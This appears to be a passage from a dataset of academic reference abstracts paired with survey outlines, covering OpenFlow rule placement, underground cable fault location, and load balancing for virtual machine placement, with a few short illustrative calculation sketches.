Solutions proposed so far strictly impose paths to be followed inside the network. We advocate instead that we can trade routing requirements within the network to concentrate on where to forward traffic, not how to do it. As an illustration of the concept, we propose an optimization problem that gets the maximum amount of traffic delivered according to policies and the actual dimensioning of the network. The traffic that cannot be accommodated is forwarded to the controller that has the capacity to process it further. We also demonstrate that our approach permits a better utilization of scarce resources in the network. --- paper_title: An Adaptable Rule Placement for Software-Defined Networks paper_content: There is a strong trend in networking to move towards Software-Defined Networks (SDN). SDNs enable easier network configuration through a separation between a centralized controller and a distributed data plane comprising a network of switches. The controller implements network policies through installing rules on switches. Recently the "Big Switch" abstraction [1] was proposed as a specification mechanism for high-level network behavior, i.e., the network policies. The network operating system or compiler can use his specification for placing rules on individual switches. However, this is constrained by the limited capacity of the Ternary Content Addressable Memories (TCAMs) used for rules in each switch. We propose an Integer Linear Programming (ILP) based solution for placing rules on switches for a given firewall policy while optimizing for the total number of rules and meeting the switch capacity constraints. Experimental results demonstrate that our approach is scalable to practical sized networks. --- paper_title: MoRule: Optimized rule placement for mobile users in SDN-enabled access networks paper_content: With the surging popularity of smartphones and tablets, mobile network traffic has dramatically increased in recent years. Software defined network (SDN) provides a scalable and flexible structure to simplify network traffic management. It has been shown that rule placement plays an important role in the performance of SDN. However, since most existing work considers static network topologies of wired networks, it cannot be directly applied for mobile networks. In this paper, we propose MoRule, an efficient rule management scheme to optimize the rule placement for mobile users. To deal with the challenges of user mobility and rule capacity constraints of switches, we design a heuristic algorithm with low-complexity to minimize the rule space occupation while guaranteeing that the mobile traffic processed by local switches is no less than a threshold. By conducting extensive simulations, we demonstrate that our proposed algorithm significantly outperforms random solutions under various network settings. --- paper_title: Shadow MACs: scalable label-switching for commodity ethernet paper_content: While SDN promises fine-grained, dynamic control of the network, in practice limited switch TCAM rule space restricts most forwarding to be coarse-grained. As an alternative, we demonstrate that using destination MAC addresses as opaque forwarding labels allows an SDN controller to leverage large MAC (L2) forwarding tables to manage a plethora of fine-grained paths. In this shadow MAC model, the SDN controller can install MAC rewrite rules at the network edge to guide traffic on to intelligently selected paths to balance traffic, avoid failed links, or route flows through middleboxes. 
Further, by decoupling the network edge from the core, we address many other problems with SDN, including consistent network updates, fast rerouting, and multipathing with end-to-end control. --- paper_title: OFFICER: A general optimization framework for OpenFlow rule allocation and endpoint policy enforcement paper_content: The Software-Defined Networking approach permits to realize new policies. In OpenFlow in particular, a controller decides on behalf of the switches which forwarding rules must be installed and where. However with this flexibility comes the challenge of the computation of a rule allocation matrix meeting both high-level policies and the network constraints such as memory or link capacity limitations. Nevertheless, in many situations (e.g., data-center networks), the exact path followed by packets does not severely impact performances as long as packets are delivered according to the endpoint policy. It is thus possible to deviate part of the traffic to alternative paths so to better use network resources without violating the endpoint policy. In this paper, we propose a linear optimization model of the rule allocation problem in resource constrained OpenFlow networks with relaxing routing policy. We show that the general problem is NP-hard and propose a polynomial time heuristic, called OFFICER, which aims to maximize the amount of carried traffic in under-provisioned networks. Our numerical evaluation on four different topologies shows that exploiting various paths allows to increase the amount of traffic supported by the network without significantly increasing the path length. --- paper_title: MicroTE: fine grained traffic engineering for data centers paper_content: The effects of data center traffic characteristics on data center traffic engineering is not well understood. In particular, it is unclear how existing traffic engineering techniques perform under various traffic patterns, namely how do the computed routes differ from the optimal routes. Our study reveals that existing traffic engineering techniques perform 15% to 20% worse than the optimal solution. We find that these techniques suffer mainly due to their inability to utilize global knowledge about flow characteristics and make coordinated decision for scheduling flows. To this end, we have developed MicroTE, a system that adapts to traffic variations by leveraging the short term and partial predictability of the traffic matrix. We implement MicroTE within the OpenFlow framework and with minor modification to the end hosts. In our evaluations, we show that our system performs close to the optimal solution and imposes minimal overhead on the network making it appropriate for current and future data centers. --- paper_title: Infinite CacheFlow in software-defined networks paper_content: Software-Defined Networking (SDN) enables fine-grained policies for firewalls, load balancers, routers, traffic monitoring, and other functionality. While Ternary Content Addressable Memory (TCAM) enables OpenFlow switches to process packets at high speed based on multiple header fields, today's commodity switches support just thousands to tens of thousands of rules. To realize the potential of SDN on this hardware, we need efficient ways to support the abstraction of a switch with arbitrarily large rule tables. To do so, we define a hardware-software hybrid switch design that relies on rule caching to provide large rule tables at low cost. 
Unlike traditional caching solutions, we neither cache individual rules (to respect rule dependencies) nor compress rules (to preserve the per-rule traffic counts). Instead we ``splice'' long dependency chains to cache smaller groups of rules while preserving the semantics of the network policy. Our design satisfies four core criteria: (1) elasticity (combining the best of hardware and software switches), (2) transparency (faithfully supporting native OpenFlow semantics, including traffic counters), (3) fine-grained rule caching (placing popular rules in the TCAM, despite dependencies on less-popular rules), and (4) adaptability (to enable incremental changes to the rule caching as the policy changes). --- paper_title: The nature of data center traffic: measurements & analysis paper_content: We explore the nature of traffic in data centers, designed to support the mining of massive data sets. We instrument the servers to collect socket-level logs, with negligible performance impact. In a 1500 server operational cluster, we thus amass roughly a petabyte of measurements over two months, from which we obtain and report detailed views of traffic and congestion conditions and patterns. We further consider whether traffic matrices in the cluster might be obtained instead via tomographic inference from coarser-grained counter data. --- paper_title: Rule Optimization for Real-Time Query Service in Software-Defined Internet of Vehicles paper_content: Internet of Vehicles (IoV) has recently gained considerable attention from both industry and research communities with the development of communication technology and smart cities. However, a proprietary and closed way of operating hardware in network equipment slows down the progress of new service deployment and extension in IoV. Moreover, the tightly coupled control and data planes in traditional networks significantly increase the complexity and cost of network management. By proposing a novel architecture, called Software-Defined Internet of Vehicles (SDIV), we adopt the software-defined network (SDN) architecture to address these problems by leveraging its separation of the control plane from the data plane and a uniform way to configure heterogeneous switches. However, the characteristics of IoV introduce significant challenges in rule installation due to the limited size of Flow Tables at OpenFlow-enabled switches, which are the main component of SDN. It is necessary to build compact Flow Tables for the scalability of IoV. Accordingly, we develop a rule optimization approach for real-time query service in SDIV. Specifically, we separate the wired data plane from the wireless data plane and use multicast addresses in the wireless data plane. Furthermore, we introduce a destination-driven model in the wired data plane for reducing the number of rules at switches. Experiments show that our rule optimization strategy reduces the number of rules while keeping the performance of data transmission. --- paper_title: Optimizing rule placement in software-defined networks for energy-aware routing paper_content: Software-defined Networks (SDN), in particular OpenFlow, is a new networking paradigm enabling innovation through network programmability. Over the past few years, many applications have been built using SDN such as server load balancing, virtual-machine migration, traffic engineering and access control. In this paper, we focus on using SDN for energy-aware routing (EAR).
Since traffic load has a small influence on the power consumption of routers, EAR allows putting unused links into sleep mode to save energy. SDN can collect the traffic matrix and then compute routing solutions satisfying QoS while being minimal in energy consumption. However, prior works on EAR have assumed that the table of an OpenFlow switch can hold an infinite number of rules. In practice, this assumption does not hold since the flow table is implemented with Ternary Content Addressable Memory (TCAM) which is expensive and power-hungry. In this paper, we propose an optimization method to minimize energy consumption for a backbone network while respecting capacity constraints on links and rule space constraints on routers. In detail, we present an exact formulation using an Integer Linear Program (ILP) and introduce an efficient greedy heuristic algorithm. Based on simulations, we show that using this smart rule space allocation, it is possible to save almost as much power consumption as the classical EAR approach. --- paper_title: Palette: Distributing tables in software-defined networks paper_content: In software-defined networks (SDNs), the network controller first formulates abstract network-wide policies, and then implements them in the forwarding tables of network switches. However, fast SDN tables often cannot scale beyond a few hundred entries. This is because they typically include wildcards, and therefore are implemented using either expensive and power-hungry TCAMs, or complex and slow data structures. This paper presents the Palette distribution framework for decomposing large SDN tables into small ones and then distributing them across the network, while preserving the overall SDN policy semantics. Palette helps balance the sizes of the tables across the network, as well as reduce the total number of entries by sharing resources among different connections. It copes with two NP-hard optimization problems: Decomposing a large SDN table into equivalent subtables, and distributing the subtables such that each connection traverses each type of subtable at least once. To implement the Palette distribution framework, we introduce graph-theoretical formulations and algorithms, and show that they achieve close-to-optimal results in practice. --- paper_title: Optimizing the "one big switch" abstraction in software-defined networks paper_content: Software Defined Networks (SDNs) support diverse network policies by offering direct, network-wide control over how switches handle traffic. Unfortunately, many controller platforms force applications to grapple simultaneously with end-to-end connectivity constraints, routing policy, switch memory limits, and the hop-by-hop interactions between forwarding rules. We believe solutions to this complex problem should be factored in to three distinct parts: (1) high-level SDN applications should define their end-point connectivity policy on top of a "one big switch" abstraction; (2) a mid-level SDN infrastructure layer should decide on the hop-by-hop routing policy; and (3) a compiler should synthesize an effective set of forwarding rules that obey the user-defined policies and adhere to the resource constraints of the underlying hardware. In this paper, we define and implement our proposed architecture, present efficient rule-placement algorithms that distribute forwarding policies across general SDN networks while managing rule-space constraints, and show how to support dynamic, incremental update of policies.
We evaluate the effectiveness of our algorithms analytically by providing complexity bounds on their running time and rule space, as well as empirically, using both synthetic benchmarks, and real-world firewall and routing policies. --- paper_title: An Adaptable Rule Placement for Software-Defined Networks paper_content: There is a strong trend in networking to move towards Software-Defined Networks (SDN). SDNs enable easier network configuration through a separation between a centralized controller and a distributed data plane comprising a network of switches. The controller implements network policies through installing rules on switches. Recently the "Big Switch" abstraction [1] was proposed as a specification mechanism for high-level network behavior, i.e., the network policies. The network operating system or compiler can use his specification for placing rules on individual switches. However, this is constrained by the limited capacity of the Ternary Content Addressable Memories (TCAMs) used for rules in each switch. We propose an Integer Linear Programming (ILP) based solution for placing rules on switches for a given firewall policy while optimizing for the total number of rules and meeting the switch capacity constraints. Experimental results demonstrate that our approach is scalable to practical sized networks. --- paper_title: DevoFlow: scaling flow management for high-performance networks paper_content: OpenFlow is a great concept, but its original design imposes excessive overheads. It can simplify network and traffic management in enterprise and data center environments, because it enables flow-level control over Ethernet switching and provides global visibility of the flows in the network. However, such fine-grained control and visibility comes with costs: the switch-implementation costs of involving the switch's control-plane too often and the distributed-system costs of involving the OpenFlow controller too frequently, both on flow setups and especially for statistics-gathering. ::: In this paper, we analyze these overheads, and show that OpenFlow's current design cannot meet the needs of high-performance networks. We design and evaluate DevoFlow, a modification of the OpenFlow model which gently breaks the coupling between control and global visibility, in a way that maintains a useful amount of visibility without imposing unnecessary costs. We evaluate DevoFlow through simulations, and find that it can load-balance data center traffic as well as fine-grained solutions, without as much overhead: DevoFlow uses 10--53 times fewer flow table entries at an average switch, and uses 10--42 times fewer control messages. --- paper_title: MoRule: Optimized rule placement for mobile users in SDN-enabled access networks paper_content: With the surging popularity of smartphones and tablets, mobile network traffic has dramatically increased in recent years. Software defined network (SDN) provides a scalable and flexible structure to simplify network traffic management. It has been shown that rule placement plays an important role in the performance of SDN. However, since most existing work considers static network topologies of wired networks, it cannot be directly applied for mobile networks. In this paper, we propose MoRule, an efficient rule management scheme to optimize the rule placement for mobile users. 
To deal with the challenges of user mobility and rule capacity constraints of switches, we design a heuristic algorithm with low-complexity to minimize the rule space occupation while guaranteeing that the mobile traffic processed by local switches is no less than a threshold. By conducting extensive simulations, we demonstrate that our proposed algorithm significantly outperforms random solutions under various network settings. --- paper_title: Hey, you darned counters!: get off my ASIC! paper_content: Software-Defined Networking (SDN) gains much of its value through the use of central controllers with global views of dynamic network state. To support a global view, SDN protocols, such as OpenFlow, expose several counters for each flow-table rule. These counters must be maintained by the data plane, which is typically implemented in hardware as an ASIC. ASIC-based counters are inflexible, and cannot easily be modified to compute novel metrics. These counters do not need to be on the ASIC. If the ASIC data plane has a fast connection to a general-purpose CPU with cost-effective memory, we can replace traditional counters with a stream of rule-match records, transmit this stream to the CPU, and then process the stream in the CPU. These software-defined counters allow far more flexible processing of counter-related information, and can reduce the ASIC area and complexity needed to support counters. --- paper_title: On the co-existence of distributed and centralized routing control-planes paper_content: Network operators can and do deploy multiple routing control-planes, e.g., by running different protocols or instances of the same protocol. With the rise of SDN, multiple control-planes are likely to become even more popular, e.g., to enable hybrid SDN or multi-controller deployments. Unfortunately, previous works do not apply to arbitrary combinations of centralized and distributed control-planes. In this paper, we develop a general theory for coexisting control-planes. We provide a novel, exhaustive classification of existing and future control-planes (e.g., OSPF, EIGRP, and Open-Flow) based on fundamental control-plane properties that we identify. Our properties are general enough to study centralized and distributed control-planes under a common framework. We show that multiple uncoordinated control-planes can cause forwarding anomalies whose type solely depends on the identified properties. To show the wide applicability of our framework, we leverage our theoretical insight to (i) provide sufficient conditions to avoid anomalies, (ii) propose configuration guidelines, and (iii) define a provably-safe procedure for reconfigurations from any (combination of) control-planes to any other. Finally, we discuss prominent consequences of our findings on the deployment of new paradigms (notably, SDN) and previous research works. --- paper_title: DomainFlow: practical flow management method using multiple flow tables in commodity switches paper_content: A scalable network with high bisection bandwidth and high availability requires efficient use of the multiple paths between pairs of end hosts. OpenFlow is an innovative technology and enables fine-grained, flow level control of Ethernet switching. However, the flow table structure defined by OpenFlow is not hardware friendly and the scalability is limited by the switch device. OpenFlow is also not sufficient for fast multipath failover. 
To overcome these limitations, we propose DomainFlow in which the network is split into sections and exact matches are used where possible to enable practical flow management using OpenFlow for commodity switches. We applied a prototype of DomainFlow to multipath flow management in the Virtual eXtensible LAN (VXLAN) overlay network environment. The total number of flow entries was reduced to 1/128 using currently available commodity switches, which was not possible before. --- paper_title: DevoFlow: scaling flow management for high-performance networks paper_content: OpenFlow is a great concept, but its original design imposes excessive overheads. It can simplify network and traffic management in enterprise and data center environments, because it enables flow-level control over Ethernet switching and provides global visibility of the flows in the network. However, such fine-grained control and visibility comes with costs: the switch-implementation costs of involving the switch's control-plane too often and the distributed-system costs of involving the OpenFlow controller too frequently, both on flow setups and especially for statistics-gathering. ::: In this paper, we analyze these overheads, and show that OpenFlow's current design cannot meet the needs of high-performance networks. We design and evaluate DevoFlow, a modification of the OpenFlow model which gently breaks the coupling between control and global visibility, in a way that maintains a useful amount of visibility without imposing unnecessary costs. We evaluate DevoFlow through simulations, and find that it can load-balance data center traffic as well as fine-grained solutions, without as much overhead: DevoFlow uses 10--53 times fewer flow table entries at an average switch, and uses 10--42 times fewer control messages. --- paper_title: Theory and Applications of Robust Optimization paper_content: In this paper we survey the primary research, both theoretical and applied, in the area of Robust Optimization (RO). Our focus is on the computational attractiveness of RO approaches, as well as the modeling power and broad applicability of the methodology. In addition to surveying prominent theoretical results of RO, we also present some recent results linking RO to adaptable models for multi-stage decision-making problems. Finally, we highlight applications of RO across a wide spectrum of domains, including finance, statistics, learning, and various areas of engineering. --- paper_title: Infinite CacheFlow in software-defined networks paper_content: Software-Defined Networking (SDN) enables fine-grained policies for firewalls, load balancers, routers, traffic monitoring, and other functionality. While Ternary Content Addressable Memory (TCAM) enables OpenFlow switches to process packets at high speed based on multiple header fields, today's commodity switches support just thousands to tens of thousands of rules. To realize the potential of SDN on this hardware, we need efficient ways to support the abstraction of a switch with arbitrarily large rule tables. To do so, we define a hardware-software hybrid switch design that relies on rule caching to provide large rule tables at low cost. Unlike traditional caching solutions, we neither cache individual rules (to respect rule dependencies) nor compress rules (to preserve the per-rule traffic counts). Instead we ``splice'' long dependency chains to cache smaller groups of rules while preserving the semantics of the network policy. 
Our design satisfies four core criteria: (1) elasticity (combining the best of hardware and software switches), (2) transparency (faithfully supporting native OpenFlow semantics, including traffic counters), (3) fine-grained rule caching (placing popular rules in the TCAM, despite dependencies on less-popular rules), and (4) adaptability (to enable incremental changes to the rule caching as the policy changes). --- paper_title: The controller placement problem paper_content: Network architectures such as Software-Defined Networks (SDNs) move the control logic off packet processing devices and onto external controllers. These network architectures with decoupled control planes open many unanswered questions regarding reliability, scalability, and performance when compared to more traditional purely distributed systems. This paper opens the investigation by focusing on two specific questions: given a topology, how many controllers are needed, and where should they go? To answer these questions, we examine fundamental limits to control plane propagation latency on an upcoming Internet2 production deployment, then expand our scope to over 100 publicly available WAN topologies. As expected, the answers depend on the topology. More surprisingly, one controller location is often sufficient to meet existing reaction-time requirements (though certainly not fault tolerance requirements). --- paper_title: vCRIB: virtualized rule management in the cloud paper_content: Cloud operators increasingly need many fine-grained rules to better control individual network flows for various management tasks. While previous approaches have advocated placing rules either on hypervisors or switches, we argue that future data centers would benefit from leveraging rule processing capabilities at both for better scalability and performance. In this paper, we propose vCRIB, a virtualized Cloud Rule Information Base that allows operators to freely define different management policies without the need to consider underlying resource constraints. The challenge in our approach is the design of a vCRIB manager that automatically partitions and places rules at both hypervisors and switches to achieve a good trade-off between resource usage and performance. --- paper_title: OFFICER: A general optimization framework for OpenFlow rule allocation and endpoint policy enforcement paper_content: The Software-Defined Networking approach permits to realize new policies. In OpenFlow in particular, a controller decides on behalf of the switches which forwarding rules must be installed and where. However with this flexibility comes the challenge of the computation of a rule allocation matrix meeting both high-level policies and the network constraints such as memory or link capacity limitations. Nevertheless, in many situations (e.g., data-center networks), the exact path followed by packets does not severely impact performances as long as packets are delivered according to the endpoint policy. It is thus possible to deviate part of the traffic to alternative paths so to better use network resources without violating the endpoint policy. In this paper, we propose a linear optimization model of the rule allocation problem in resource constrained OpenFlow networks with relaxing routing policy. We show that the general problem is NP-hard and propose a polynomial time heuristic, called OFFICER, which aims to maximize the amount of carried traffic in under-provisioned networks. 
Our numerical evaluation on four different topologies shows that exploiting various paths makes it possible to increase the amount of traffic supported by the network without significantly increasing the path length. ---
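To make the rule-placement formulations sketched in the abstracts above (the ILP with per-switch rule-space constraints and the greedy heuristics of OFFICER and the energy-aware-routing work) more concrete, the following is a minimal, hypothetical Python sketch rather than the implementation of any cited paper: flows are considered in decreasing order of traffic volume, and a flow's rules are installed on every switch of its path only if all of those switches still have free table entries; otherwise the flow is left to the controller or a default action. All names and data structures are illustrative assumptions.

# Hypothetical greedy rule-placement sketch (illustrative only, not from the cited papers).
# Each accepted flow consumes one rule on every switch of its path; a flow is accepted
# only if every switch on the path still has a free TCAM entry.
def greedy_rule_placement(flows, table_capacity):
    """flows: list of (flow_id, traffic_volume, path), where path is a list of switch ids.
    table_capacity: dict switch_id -> number of free rule slots.
    Returns (accepted_flow_ids, placed_rules, rejected_flow_ids)."""
    used = {switch: 0 for switch in table_capacity}
    accepted, placed, rejected = [], [], []
    # Serve the largest flows first to maximise the carried traffic.
    for flow_id, volume, path in sorted(flows, key=lambda f: -f[1]):
        if all(used[s] + 1 <= table_capacity[s] for s in path):
            for s in path:
                used[s] += 1
                placed.append((s, flow_id))
            accepted.append(flow_id)
        else:
            rejected.append(flow_id)  # handled by the controller / default rule
    return accepted, placed, rejected

# Example with two switches offering two free entries each.
flows = [("f1", 10, ["s1", "s2"]), ("f2", 7, ["s1"]), ("f3", 5, ["s1", "s2"])]
print(greedy_rule_placement(flows, {"s1": 2, "s2": 2}))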
Title: Rules Placement Problem in OpenFlow Networks: A Survey Section 1: BACKGROUND Description 1: Write a background overview of SDN and OpenFlow, explaining their core principles and components. Section 2: MOTIVATION Description 2: Describe the motivations behind the OpenFlow rules placement problem, outlining use cases such as access control and traffic engineering. Section 3: PROBLEM FORMALIZATION Description 3: Formalize the OpenFlow rules placement problem, define the network model, and describe the essential inputs and constraints. Section 4: CHALLENGES Description 4: Discuss the primary challenges in the OpenFlow rules placement problem, namely resource limitations and signaling overhead. Section 5: EFFICIENT MEMORY MANAGEMENT Description 5: Survey and classify the techniques proposed in the literature for managing memory limitations in OpenFlow switches. Section 6: REDUCING SIGNALING OVERHEAD Description 6: Summarize the methods and ideas proposed to mitigate signaling overhead in OpenFlow rules placement. Section 7: FUTURE RESEARCH DIRECTIONS Description 7: Explore the potential future research areas and open questions within the context of the OpenFlow rules placement problem. Section 8: CONCLUSION Description 8: Conclude by summarizing the main points and the significance of solving the OpenFlow rules placement problem.
Cable Fault Monitoring and Indication: A Review
11
--- paper_title: Detection of Incipient Faults in Distribution Underground Cables paper_content: The incipient faults in underground cables are largely caused by voids in cable insulations or defects in splices or other accessories. This type of fault would repeatedly occur and subsequently develop into a permanent fault sooner or later after its first occurrence. Two algorithms are presented to detect and classify the incipient faults in underground cables at the distribution voltage levels. Based on the methodology of wavelet analysis, one algorithm detects the fault-induced transients and therefore identifies the incipient faults. Based on the analysis of the superimposed fault current and negative sequence current in the time domain, the other algorithm is particularly suitable to detect the single-line-to-ground (SLG) incipient faults, which mostly occur in underground cables. Both methods are designed to be applied in real systems. Hence, to verify the effectiveness and functionalities of the proposed schemes, different fault conditions, various system configurations, and real field cases are examined, and other transients caused by permanent faults, capacitor switching, load changing, etc., are studied as well. --- paper_title: Ageing mechanisms and diagnostics for power cables - an overview paper_content: This paper describes briefly the main ageing and failure mechanisms and will indicate the advantages and limitations of the diagnostic tests available for the different insulation systems used in distribution and transmission cable systems. SC21 of CIGRE has addressed the subject of ageing factors and diagnostics of cable systems and has published three reports covering both fluid-filled and extruded cables. The reports describe ageing factors and several diagnostic methods, their purpose, and guidelines for use. --- paper_title: Computerized underground cable fault location expertise paper_content: Power Technologies, Inc. (PTI) developed an expert system and on-line advisor for the Electric Power Research Institute (EPRI). The system, FAULT, provides guidance for field crews to diagnose a cable failure, recommend applicable fault location techniques, and trouble-shoot resulting difficulties which occur during the process of locating underground cable faults on transmission and distribution cable systems. The fault location methods which were identified during development of the expert system are presented in this paper, along with utility statistics from a survey on underground cable fault location. --- paper_title: Real-time expert system for fault location on high voltage underground distribution cables paper_content: To ensure minimum loss of system security and revenue it is essential that faults on underground cable systems be located and repaired rapidly. Currently in the UK, the impulse current method is used to prelocate faults, prior to using acoustic methods to pinpoint the fault location. The impulse current method is heavily dependent on the engineer's knowledge and experience in recognising/interpreting the transient waveforms produced by the fault. The development of a prototype real-time expert system for the prelocation of cable faults is described. Results from the prototype demonstrate the feasibility and benefits of the expert system as an aid for the diagnosis and location of faults on underground cable systems.
--- paper_title: Impedance based fault location method for phase to phase and three phase faults in transmission systems paper_content: This paper presents a new impedance-based fault location method for phase-to-phase and three-phase faults. This method utilizes the impedance measured by the distance relay and the superimposed current factor, which is the ratio of the post-fault current to the superimposed current, to discriminate the fault position on the line. This method is robust against the fault resistance. The presented method only uses the impedance measured by the distance relay, the superimposed current factor and a few data which can be obtained through SCADA-based databases. --- paper_title: Automatic fault location for underground low voltage distribution networks paper_content: This paper describes an automatic fault location technique for permanent faults in underground low voltage distribution networks (ULVDNs). It uses signals from an existing time domain reflectometry (TDR) instrument. It preprocesses TDR signals to eliminate reflections due to single-phase tee-offs, and to locate 3-phase open or short circuit faults, and also uses adaptive filtering to compare the TDR signals to locate faults. In essence, the procedure minimises the interpretation skill required from a user of a typical TDR based fault location instrument. The relative performance of the system is demonstrated using real field data. --- paper_title: Impedance based fault location method for phase to phase and three phase faults in transmission systems paper_content: This paper presents a new impedance-based fault location method for phase-to-phase and three-phase faults. This method utilizes the impedance measured by the distance relay and the superimposed current factor, which is the ratio of the post-fault current to the superimposed current, to discriminate the fault position on the line. This method is robust against the fault resistance. The presented method only uses the impedance measured by the distance relay, the superimposed current factor and a few data which can be obtained through SCADA-based databases. --- paper_title: Computerized underground cable fault location expertise paper_content: Power Technologies, Inc. (PTI) developed an expert system and on-line advisor for the Electric Power Research Institute (EPRI). The system, FAULT, provides guidance for field crews to diagnose a cable failure, recommend applicable fault location techniques, and trouble-shoot resulting difficulties which occur during the process of locating underground cable faults on transmission and distribution cable systems. The fault location methods which were identified during development of the expert system are presented in this paper, along with utility statistics from a survey on underground cable fault location. ---
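As a concrete illustration of the time domain reflectometry (TDR) principle used by the fault-location references above, the short sketch below converts the round-trip time of the reflected pulse into a fault distance via d = v_p * t / 2, where v_p is the propagation velocity in the cable (a velocity factor times the speed of light). The velocity factor and the example timing are illustrative assumptions, not values taken from the cited papers.

# Minimal TDR distance estimate: the injected pulse travels to the fault and back,
# so the one-way fault distance is half of (propagation velocity x round-trip time).
C = 3.0e8  # speed of light in vacuum, m/s

def tdr_fault_distance(round_trip_time_s, velocity_factor=0.55):
    # velocity_factor: fraction of c at which the pulse propagates in the cable
    # (roughly 0.5-0.7 for typical power cables; the default here is an assumption).
    v_p = velocity_factor * C
    return v_p * round_trip_time_s / 2.0

# Example: a reflection observed 4 microseconds after the pulse is injected.
print(f"Estimated fault distance: {tdr_fault_distance(4e-6):.1f} m")  # about 330 m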
Title: Cable Fault Monitoring and Indication: A Review Section 1: Introduction Description 1: Introduce the importance of accurate fault location in power systems, explaining the challenges and need for efficient fault location methods in transmission and underground power cable networks. Section 2: Types of Cable Faults Description 2: Describe various types of cable faults, including open conductor faults, shorted faults, and high impedance faults. Section 3: Open Conductor Fault Description 3: Explain what an open conductor fault is and provide details on its characteristics and implications. Section 4: Shorted Fault Description 4: Describe the characteristics of a shorted fault, emphasizing the low resistance path to ground. Section 5: High Impedance Fault Description 5: Discuss high impedance faults, detailing how they exhibit a high resistive path to ground and potential non-linear resistive characteristics. Section 6: Types of Faults Detection Description 6: Outline the different methods used to detect faults in power lines and cables, highlighting their suitability for each type of fault. Section 7: A-Frame Method Description 7: Provide an in-depth explanation of the A-Frame method, including its procedure, advantages, and limitations. Section 8: Thumper Method Description 8: Discuss the Thumper method, detailing its use of high voltage surges to locate faults and the challenges it presents. Section 9: Time Domain Reflectometry (TDR) Description 9: Describe the Time Domain Reflectometry (TDR) method, explaining its process and how it determines the fault location using signal reflections. Section 10: Bridge Method Description 10: Explain the Bridge method for locating faults, including the principles of modified Wheatstone circuits and specific bridge techniques like Murray and Glaser bridges. Section 11: Conclusions Description 11: Summarize the importance of fault location in power systems, reviewing the methods discussed and emphasizing the need for immediate fault indication and accurate location techniques.
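Since the Bridge Method section of the outline above covers Murray-type loop tests, the following sketch shows the classical Murray loop balance relation under the usual textbook assumptions (a healthy return conductor of the same length and resistance per metre as the faulted one, looped at the far end): at balance, the fault distance from the test end is d = 2L * Q / (P + Q), where P and Q are the bridge ratio arms. The numeric values are illustrative assumptions.

# Murray loop bridge sketch: the sound conductor is joined to the faulted one at the
# far end, forming a loop of length 2L; at balance the arm ratio gives the fault distance.
def murray_loop_fault_distance(cable_length_m, P_ohm, Q_ohm):
    # d = 2L * Q / (P + Q), assuming identical conductors form the loop.
    return 2.0 * cable_length_m * Q_ohm / (P_ohm + Q_ohm)

# Example: a 1000 m cable balanced with ratio arms P = 150 ohm and Q = 50 ohm.
print(f"Fault at about {murray_loop_fault_distance(1000, 150, 50):.0f} m")  # 500 m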
A Survey on Load Balancing Algorithms for VM Placement in Cloud Computing
8
--- paper_title: Server virtualization architecture and implementation paper_content: Virtual machine technology, or virtualization, is gaining momentum in the information technology community. While virtual machines are not a new concept, recent advances in hardware and software technology have brought virtualization to the forefront of IT management. Stability, cost savings, and manageability are among the reasons for the recent rise of virtualization. Virtual machine solutions can be classified by hardware, software, and operating system/containers. From its inception on the mainframe to distributed servers on x86, the virtual machine has matured and will play an increasing role in systems management. --- paper_title: A Mathematical Programming Approach for Server Consolidation Problems in Virtualized Data Centers paper_content: Today's data centers offer IT services mostly hosted on dedicated physical servers. Server virtualization provides a technical means for server consolidation. Thus, multiple virtual servers can be hosted on a single server. Server consolidation describes the process of combining the workloads of several different servers on a set of target servers. We focus on server consolidation with dozens or hundreds of servers, which can be regularly found in enterprise data centers. Cost saving is among the key drivers for such projects. This paper presents decision models to optimally allocate source servers to physical target servers while considering real-world constraints. Our central model is proven to be an NP-hard problem. Therefore, besides an exact solution method, a heuristic is presented to address large-scale server consolidation projects. In addition, a preprocessing method for server load data is introduced allowing for the consideration of quality-of-service levels. Extensive experiments were conducted based on a large set of server load data from a data center provider focusing on managerial concerns over what types of problems can be solved. Results show that, on average, server savings of 31 percent can be achieved only by taking cycles in the server workload into account. --- paper_title: Allocation of Virtual Machines in Cloud Data Centers—A Survey of Problem Models and Optimization Algorithms paper_content: Data centers in public, private, and hybrid cloud settings make it possible to provision virtual machines (VMs) with unprecedented flexibility. However, purchasing, operating, and maintaining the underlying physical resources incurs significant monetary costs and environmental impact. Therefore, cloud providers must optimize the use of physical resources by a careful allocation of VMs to hosts, continuously balancing between the conflicting requirements on performance and operational costs. In recent years, several algorithms have been proposed for this important optimization problem. Unfortunately, the proposed approaches are hardly comparable because of subtle differences in the used problem models. This article surveys the used problem formulations and optimization algorithms, highlighting their strengths and limitations, and pointing out areas that need further research. --- paper_title: A Review on Load Balancing of Virtual Machine Resources in Cloud Computing paper_content: Effective load-balancing (LB) management achieves high-performance computing (HPC) and green computing. Users can run their jobs on virtual machines (VMs). A virtual machine (VM) has its own resources (CPU and memory).
A VM migrates from one host to another upon VM failure, hot spots, or high resource demand. Effective LB management is based on scheduling policies and management strategies. This paper discusses the available scheduling mechanisms, goals and strategies of load balancing techniques. The aim of this work is to elaborate a key analysis of research works on LB. --- paper_title: Live Migration of Multiple Virtual Machines with Resource Reservation in Cloud Computing Environments paper_content: Virtualization technology is currently becoming increasingly popular and valuable in cloud computing environments due to the benefits of server consolidation, live migration, and resource isolation. Live migration of virtual machines can be used to implement energy saving and load balancing in cloud data centers. However, to our knowledge, most of the previous work concentrated on the implementation of migration technology itself but did not consider the impact of the resource reservation strategy on migration efficiency. This paper focuses on the live migration strategy of multiple virtual machines with different resource reservation methods. We first describe the live migration framework of multiple virtual machines with resource reservation technology. Then we perform a series of experiments to investigate the impacts of different resource reservation methods on the performance of live migration in both the source machine and the target machine. Additionally, we analyze the efficiency of parallel migration strategy and workload-aware migration strategy. The metrics such as downtime, total migration time, and workload performance overheads are measured. Experiments reveal some new discoveries about live migration of multiple virtual machines. Based on the observed results, we present corresponding optimization methods to improve the migration efficiency. --- paper_title: Server-storage virtualization: integration and load balancing in data centers paper_content: We describe the design of an agile data center with integrated server and storage virtualization technologies. Such data centers form a key building block for new cloud computing architectures. We also show how to leverage this integrated agility for non-disruptive load balancing in data centers across multiple resource layers - servers, switches, and storage. We propose a novel load balancing algorithm called VectorDot for handling the hierarchical and multi-dimensional resource constraints in such systems. The algorithm, inspired by the successful Toyoda method for multi-dimensional knapsacks, is the first of its kind. We evaluate our system on a range of synthetic and real data center testbeds comprising VMware ESX servers, IBM SAN Volume Controller, Cisco and Brocade switches. Experiments under varied conditions demonstrate the end-to-end validity of our system and the ability of VectorDot to efficiently remove overloads on server, switch and storage nodes. --- paper_title: Cost of Virtual Machine Live Migration in Clouds: A Performance Evaluation paper_content: Virtualization has become commonplace in modern data centers, often referred to as "computing clouds". The capability of virtual 